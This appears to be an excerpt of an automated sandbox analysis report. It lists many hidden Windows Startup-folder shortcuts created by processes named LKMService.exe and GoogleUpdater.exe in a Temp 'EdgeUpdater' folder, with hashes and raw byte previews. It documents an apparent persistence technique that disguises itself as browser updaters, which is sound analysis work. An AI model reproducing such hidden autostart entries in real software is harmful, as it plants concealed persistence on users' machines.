                                                                                                                                                                                                                                          Preview:L..................F...."...${.......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYle..Temp..:......EW<2BYle....^......................`..T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9d20ef342720412b8e70c55d8f3213a0.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:42:46 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.930701432652654
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8r7cDYlXPXv+RIgKe9sjiSAzav/42eEFsuqygm:8roDYlf2Rhssevgosryg
                                                                                                                                                                                                                                          MD5:04DAE62F921F259211618C8985EF1B40
                                                                                                                                                                                                                                          SHA1:D4F71413D16FB38868953D1C82DAD4EEDB3F5469
                                                                                                                                                                                                                                          SHA-256:4898B421D4F35AFFE3C4DF48A786BC5471D3749CAA4F6CC9A40C280A83FE00DE
                                                                                                                                                                                                                                          SHA-512:999CCF991B4D4ECB230D7A4BF755D792B59D98A7522ADFB6F5E6BC1600DDAC052F9CE2BDE5C8C30053AE73278FCDBBDE87F3C29D28B22E8D7CFCC7CD8FD5045D
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......#................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BYVe..EDGEUP~1..H......BYVeBYVe............................5.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9ec753f0a9ec4c1cbaafc018f53c78c1.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:20 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.954746982499762
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8x7cDYlXPXv+RdgKwj/jiSAzav/42eEFsuqygm:8xoDYlf2RK7sevgosryg
                                                                                                                                                                                                                                          MD5:526AD1738338BAF9CA193E4DEA4668BF
                                                                                                                                                                                                                                          SHA1:8DC07F500AD894E88A28F1F381925A74DD9C14D1
                                                                                                                                                                                                                                          SHA-256:83216B6699B56DCCC1291F3E10AED2BCF4AAFA7B5840B6E3F2F2E09418BCBA82
                                                                                                                                                                                                                                          SHA-512:8EC6454D588A350A48A98A864E2091A823A44D3D97E0F22B8AFD109560CE494345021A1D154655F94D80DC7B5768ED7CB434B9CBB967BFD5EAE45081A70535BC
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......8................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYke..Temp..:......EW<2BYke....^........................T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a3686568f4ba4794b959cf373d8966f0.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:19 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.954215051148119
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8pxe7cDYlXPXv+RdgK1j/jiSAzav/42eEFsuqygm:8pxeoDYlf2Rv7sevgosryg
                                                                                                                                                                                                                                          MD5:0D56CF974B1269B414D192C0B952E455
                                                                                                                                                                                                                                          SHA1:22264A4F039BBBA7C2EFE7ED5788EB1AA5E8612D
                                                                                                                                                                                                                                          SHA-256:B2E3D8B4BA3A34145090995FE73EB34500685C79EB68BFEF6956070EFDF58EE4
                                                                                                                                                                                                                                          SHA-512:B02C8DFEFC38F8AB6D47C0B1714045301EAD04D42E567815C8A0FE6A5D2997BF19D8E57FBE3C9B94DF4560809470032799C6FA842C29B61018C47EE637E1713C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYke..Temp..:......EW<2BYke....^......................7..T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a646bd2097034060960970137187629f.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:13 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.948445057063715
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8O7cDYlXPXv+RBgKbj/jiSAzav/42eEFsuqygm:8OoDYlf2RJ7sevgosryg
                                                                                                                                                                                                                                          MD5:0768C96AA9322EBCAFDA68962460264F
                                                                                                                                                                                                                                          SHA1:3D782FD68ED7E867761518A9E590EE03CEBA1344
                                                                                                                                                                                                                                          SHA-256:2E65FD36847A3698E9152EB2CFFDCDBC12F05202A32E70FF1C8FBB0001E00BE8
                                                                                                                                                                                                                                          SHA-512:8FA693483CACAFAFE660F3BD607DC3812157357F54451A807EE7C7A5413EA603F176C11656D1118A59618D47D91EA550C2FB8BB8659336C16E045528F8F7C8BF
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......M|..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYge..Temp..:......EW<2BYge....^......................R$.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a7612ab9a5e54eb893381398404e0fd2.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:39 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.959785157762636
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:890SDYlXPXv+RvgKWnj/jiSAzav/42eEFsuqygm:890SDYlf2R2n7sevgosryg
                                                                                                                                                                                                                                          MD5:81FB6773173C9D854E69E965CC6BB547
                                                                                                                                                                                                                                          SHA1:1AD4AAA483E8102BB1257CF7C38039A05DD37F64
                                                                                                                                                                                                                                          SHA-256:D357C9B5BA1277E345F614E48B054A5691A97EDE1C6ACCBCD3C70FA2D0582727
                                                                                                                                                                                                                                          SHA-512:14A98516EE5899D8DE21D0400A2BFCB9BCA5CE0C6B60F865E42B69FCFEFA135F74FCD9312B5963E89A418F40529A0523EE66B35843B0CEFBEAAB48C3AD35AA62
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......,..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^......................([.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ac72fec142844639a98515ad8c85ebf2.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:34 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.957169407212366
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8wsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8wsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:DA2C106D96EA3B46FD5B0EE665975565
                                                                                                                                                                                                                                          SHA1:71EFDB0BB79F33C9AADF6BCE187193D3BEC022B5
                                                                                                                                                                                                                                          SHA-256:A4D926447EDD25F356C9E7C639751FE68FB8EE8937A4C99603642D6E1816C8CC
                                                                                                                                                                                                                                          SHA-512:A58ECDA8EA6A72CEACAC6ADDCF8DA9C644C10AFEAFA8B4EB07C626B24A1787E0BD1FD6F2D84103039F67E986DA9B26083F9660D3D5FFA9AEFC74F3F70099325A
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_aff57713a0f143e6ab4cfbcbecf0029d.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:32 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.9582277425807195
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8RSDYlXPXv+RvgKW5j/jiSAzav/42eEFsuqygm:8RSDYlf2R257sevgosryg
                                                                                                                                                                                                                                          MD5:7E50642BDDB06C0A6BA443AB14532C35
                                                                                                                                                                                                                                          SHA1:3E1DCD2A96FCCB4ECFF4464C494715FEF631DE9F
                                                                                                                                                                                                                                          SHA-256:1ADAF286564B0021CD0B3B27203C815819D09C140C8F6CF2DB8CB9758D2A07FC
                                                                                                                                                                                                                                          SHA-512:198AA768C97D029A3B2B3485B9F28C25AB6116E2F118B1225090DDA47941B8147BBE5A7951A5C69741143C54563FE98C4134D575E9CA5F896A180276DD7027F0
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M..................t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^......................Y/.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b79c001705c7471c9b09da7c8889443b.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:11 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.95866535121361
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8Q7cDYlXPXv+R2vgKIj/jiSAzav/42eEFsuqygm:8QoDYlf2RP7sevgosryg
                                                                                                                                                                                                                                          MD5:4655F2BF546721D038481153AD45C2B9
                                                                                                                                                                                                                                          SHA1:573DEC253C4BB0430AF403ECE3AD0A2621191F76
                                                                                                                                                                                                                                          SHA-256:113F589CFF67B2F02BC8656DA594A3F0E2803D0E637F4803DC107EA326A5F82C
                                                                                                                                                                                                                                          SHA-512:413388F1D2B484A18386601228104F874D264A3470785A0DC021EBC1ED06D8DCB9B3EE5B94C1DD48C18F3618FF871E24871FAFDC751FC392C89712B1FFBAE3A8
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......:..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYfe..Temp..:......EW<2BYfe....^.....................+...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b9dd23ed908349939df79b6e6b11c2d5.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:29 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.964542299559274
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8OsDYlXPXv+RZgKcj/jiSAzav/42eEFsuqygm:8OsDYlf2Rm7sevgosryg
                                                                                                                                                                                                                                          MD5:13EF7A7C4193C0E8B6540AF6A37D9E70
                                                                                                                                                                                                                                          SHA1:359584EB6F38923987DBF841A7970C36E23ED654
                                                                                                                                                                                                                                          SHA-256:C02108AAC7B0ADBB3AD4D80426642954AAB5D057A83D953812B0894003F443D1
                                                                                                                                                                                                                                          SHA-512:117992D42782992D158D4799A2AE0969A124735F364A42D8538341F94E23DFF62837D854672F67D9D75CBD0DB70C3A450AD7D4C18231BB9D12C8480A81027847
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^.....................D.!.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bad8a4f53f8247f48542c0906ec45d40.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:44 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.964538841136749
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8qsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8qsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:44893ED6C98E335CC46AA8691C756D43
                                                                                                                                                                                                                                          SHA1:D00B20D0F1457DB30EEB2C5FAEB519CDE3BF0571
                                                                                                                                                                                                                                          SHA-256:7FDD7959DAB525449463B8A2FA3EFF2B2A7D751244C43C40C5A0AE802068FFF3
                                                                                                                                                                                                                                          SHA-512:B30167CB8669FA3E5DC2BD47D992BFF1CFD055C4F612E97BB81B744F4F1ED738AE001A6ABA38ABB1BDC6ACF6967F6739E27789DE1837CF583A4DEEB215F515D6
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......w...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bb968b56f9e847ceb95b39fa591b4c77.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:53 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.957845120534784
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8DsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8DsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:FF7ABC2F16A25E89B083772A227CF9E9
                                                                                                                                                                                                                                          SHA1:676177BEBDD2DA7D7F825D889AEBAA74FE5CC7F3
                                                                                                                                                                                                                                          SHA-256:37061444BA096ED3174BA7164D6CB4772FA60F4675D22240C57D987CC75DB863
                                                                                                                                                                                                                                          SHA-512:7DBDE54A37F6411841DAB2A0C77866DC19C3D8C43A202202A1D502FDE2F561B05DD7D788AA6E62744786199297F656CBEEFD58AF29A1F941DB7FF91D4F00F135
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
